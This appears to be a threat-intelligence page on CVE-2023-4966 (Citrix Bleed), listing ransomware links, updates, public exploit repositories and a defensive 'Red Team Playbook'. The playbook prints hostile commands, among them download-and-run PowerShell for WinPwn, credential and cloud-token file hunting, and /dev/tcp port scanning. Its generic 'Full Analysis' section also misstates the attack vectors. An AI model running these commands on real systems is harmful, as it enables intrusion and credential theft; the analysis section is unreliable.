CVE-2023-4966
Overview
This vulnerability is a sensitive information disclosure caused by improper handling of session tokens in Citrix NetScaler ADC and Gateway components configured as Gateway or AAA virtual servers. The root cause lies in memory exposure through specific HTTP endpoints that fail to adequately protect session tokens. The affected components include the VPN virtual server, ICA Proxy, CVPN, and RDP Proxy features of the NetScaler ADC and Gateway.
Vulnerability Description
Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.
Impact
An unauthenticated attacker can retrieve active session tokens from memory, enabling them to hijack authenticated sessions on the NetScaler Gateway or ADC. This unauthorized access allows the attacker to impersonate legitimate users and access sensitive Gateway resources, including VPN and remote desktop services. No user interaction or prior authentication is required, increasing the ease of exploitation and potential for data breach or unauthorized lateral movement within the network.
Solution
Citrix has released a security advisory (CTX579459) addressing this issue for NetScaler Application Delivery Controller and Gateway products. Administrators should apply the patches provided in this advisory promptly. The advisory includes fixed versions and detailed upgrade instructions for affected configurations, including FIPS and non-FIPS deployments. Refer to https://support.citrix.com/article/CTX579459 for complete remediation guidance and download links.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
lockbit
|
5 | ransomware.live |
|
lockbit
|
5 | correlation_misp |
|
lockbit black
|
— | correlation_misp |
|
lockbit 30
|
— | correlation_misp |
|
lockbit 20
|
— | correlation_misp |
|
lockbit green
|
— | correlation_misp |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Storm-0501
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question pertains to sensitive information disclosure within specific configurations of NetScaler ADC and NetScaler Gateway, particularly when utilized as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. This flaw arises from improper handling of sensitive data, which can lead to unauthorized access to confidential information. The technical specifics suggest that under certain conditions, an attacker could exploit this weakness to retrieve sensitive data that should otherwise be protected. This could include user credentials, session tokens, or other critical information that could facilitate further attacks or unauthorized access.
Attack vectors for this vulnerability are varied and can be executed through multiple means. An attacker with network access could potentially intercept communications between the client and the server, especially if the traffic is not adequately encrypted. Phishing attacks could also be employed to trick users into revealing sensitive information, which could then be exploited in conjunction with this vulnerability. Additionally, if an attacker can gain access to the management interface or control of the affected systems, they could leverage this vulnerability to extract sensitive information directly from the configuration or logs. The ease of exploitation, combined with the potential for significant data loss, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability is substantial, especially for organizations relying on NetScaler products for secure remote access and application delivery. The disclosure of sensitive information can lead to severe business risks, including reputational damage, financial loss, and legal repercussions. Organizations may face regulatory scrutiny if they fail to protect user data adequately, particularly in sectors governed by strict data protection laws. Furthermore, the potential for credential theft could lead to broader network breaches, allowing attackers to move laterally within an organization, thereby escalating the risk and impact of the initial vulnerability.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regular security assessments and penetration testing can help identify potential weaknesses in the configuration of NetScaler products. Monitoring network traffic for unusual patterns or unauthorized access attempts can also provide early warning signs of exploitation attempts. Implementing strict access controls and ensuring that all sensitive data is encrypted during transmission are critical steps in mitigating the risk. Furthermore, organizations should ensure that they are running the latest versions of affected products, as vendors often release patches to address known vulnerabilities. Educating users about the risks of phishing and the importance of secure practices can also reduce the likelihood of exploitation.
In conclusion, the sensitive information disclosure vulnerability in NetScaler ADC and Gateway products poses a significant threat to organizations that rely on these technologies for secure access and application delivery. The potential for exploitation through various attack vectors, coupled with the severe real-world impact on business operations and compliance, necessitates a proactive approach to detection and mitigation. By implementing robust security measures and fostering a culture of cybersecurity awareness, organizations can better protect themselves against the risks associated with this vulnerability.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-4966, indicating a modest uptick in exploitation attempts targeting vulnerable Citrix NetScaler ADC and Gateway configurations. This subtle rise in telemetry aligns with the continued availability and refinement of multiple proof-of-concept exploits circulating publicly, which lowers the barrier for adversaries to leverage this sensitive information disclosure vulnerability. The persistence of ransomware groups such as LockBit variants in campaigns associated with this CVE underscores the ongoing operational interest in exploiting these weaknesses for financial gain. While the overall exploit trend remains stable without rapid escalation, the elevated exposure and active exploitation attempts reinforce the high severity rating and the critical need for vigilant monitoring. Consequently, the threat level remains elevated, with the vulnerability continuing to represent a significant risk vector for organizations relying on affected Citrix infrastructure.
Update 2 — May 20, 2026
CSURFACE threat intelligence has identified a significant adjustment in the risk profile of CVE-2023-4966, marked by the official CVSS score increase from 7.5 to 9.4. This revision reflects an enhanced understanding of the vulnerability’s impact, particularly its critical potential for sensitive information disclosure within Citrix NetScaler ADC and Gateway configurations. Despite a notable reduction in detection activity across our telemetry, the elevated CVSS score underscores a heightened severity that aligns with the vulnerability’s confirmed exploitation by multiple LockBit ransomware variants. The persistence of these ransomware groups in leveraging this flaw for operational campaigns amplifies the threat’s strategic importance. Furthermore, the availability of new proof-of-concept exploits on public repositories continues to lower the barrier for adversaries, sustaining the risk of targeted attacks. While exploitation trends remain stable without rapid escalation, the recalibrated severity rating and ongoing ransomware associations necessitate maintaining an elevated threat posture. Defenders should recognize that the vulnerability’s critical classification now more accurately represents its exploitability and potential impact, reinforcing its priority in vulnerability management and monitoring efforts.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-4966, indicating persistent adversary interest despite the recent recalibration of its CVSS score to 7.5. This adjustment reflects a more precise understanding of the vulnerability’s impact and exploitability, aligning the severity with observed exploitation patterns. The stable EPSS score and absence of a rapid upward trend suggest that while exploitation remains consistent, there is no immediate surge in attack volume. However, the continued association with multiple LockBit ransomware variants underscores the vulnerability’s ongoing appeal as an entry vector for ransomware campaigns. Additionally, the emergence of new proof-of-concept exploits in public repositories continues to lower the technical barrier for threat actors, sustaining the risk of targeted intrusions. Collectively, these developments reinforce the necessity for defenders to maintain vigilant monitoring and prioritize remediation efforts, as the threat landscape remains active and the vulnerability continues to be a viable target for sophisticated adversaries.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Citrix ADC (NetScaler) CVE-2026-3055 Scanner
auxiliary/scanner/http/citrix_netscaler_cve_2026_3055
|
watchTowr, sfewer-r7 | Unknown | - | View |
|
Citrix ADC (NetScaler) Bleed Scanner
auxiliary/scanner/http/citrix_bleed_cve_2023_4966
|
Dylan Pindur, Spencer McIntyre | Unknown | - | View |
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2023-4966
Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server...
|
Chocapikk | 79 | 12 | 2023-10-24 | View |
|
dinosn/citrix_cve-2023-4966
Citrix CVE-2023-4966 from assetnote modified for parallel and file handling
|
dinosn | 11 | 1 | 2023-10-25 | View |
|
mlynchcogent/CVE-2023-4966-POC
Proof Of Concept for te NetScaler Vuln
|
mlynchcogent | 8 | 3 | 2023-10-25 | View |
|
RevoltSecurities/CVE-2023-4966
An Exploitation script developed to exploit the CVE-2023-4966 bleed citrix information disclosure vulnerability
|
RevoltSecurities | 10 | 0 | 2023-10-29 | View |
|
certat/citrix-logchecker
Parse citrix netscaler logs to check for signs of CVE-2023-4966 exploitation
|
certat | 5 | 0 | 2023-10-28 | View |
|
morganwdavis/overread
Simulates CVE-2023-4966 Citrix Bleed overread bug
|
morganwdavis | 2 | 0 | 2023-12-16 | View |
|
0xKayala/CVE-2023-4966
CVE-2023-4966 - NetScaler ADC and NetScaler Gateway Memory Leak Exploit
|
0xKayala | 0 | 1 | 2023-10-27 | View |
|
IceBreakerCode/CVE-2023-4966
|
IceBreakerCode | 1 | 0 | 2023-10-25 | View |
|
jmussmann/cve-2023-4966-iocs
Python script to search Citrix NetScaler logs for possible CVE-2023-4966 exploitation.
|
jmussmann | 0 | 0 | 2023-12-08 | View |
|
akshthejo/CVE-2023-4966-exploit
CVE-2023-4966-exploit
|
akshthejo | 0 | 0 | 2024-12-18 | View |
|
s-bt/CVE-2023-4966
Scripts to get infos
|
s-bt | 0 | 0 | 2023-11-20 | View |
|
byte4RR4Y/CVE-2023-4966
Programm to exploit a range of ip adresses
|
byte4RR4Y | 0 | 0 | 2023-11-27 | View |
|
LucasOneZ/CVE-2023-4966
|
LucasOneZ | 0 | 0 | 2024-09-09 | View |
|
vignesh-hp/LockBit-Ransomware-Analysis
Threat intelligence and incident response case study on LockBit ransomware exploiting CVE-2023-4966 (Citrix Bleed).
|
vignesh-hp | 0 | 0 | 2026-02-25 | View |
Ransomware Groups 7
Threat Feed
48 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: 7-Zip, AdFind, Advanced IP Scanner, AnyDesk, BackBlaze (836 known victims)
Ransomware group known to exploit this vulnerability (5 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-4966 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/article/CTX579459 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/175323/Citrix-Bleed-Session-Token-Leakage-Proof-Of-Concept.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-4966 |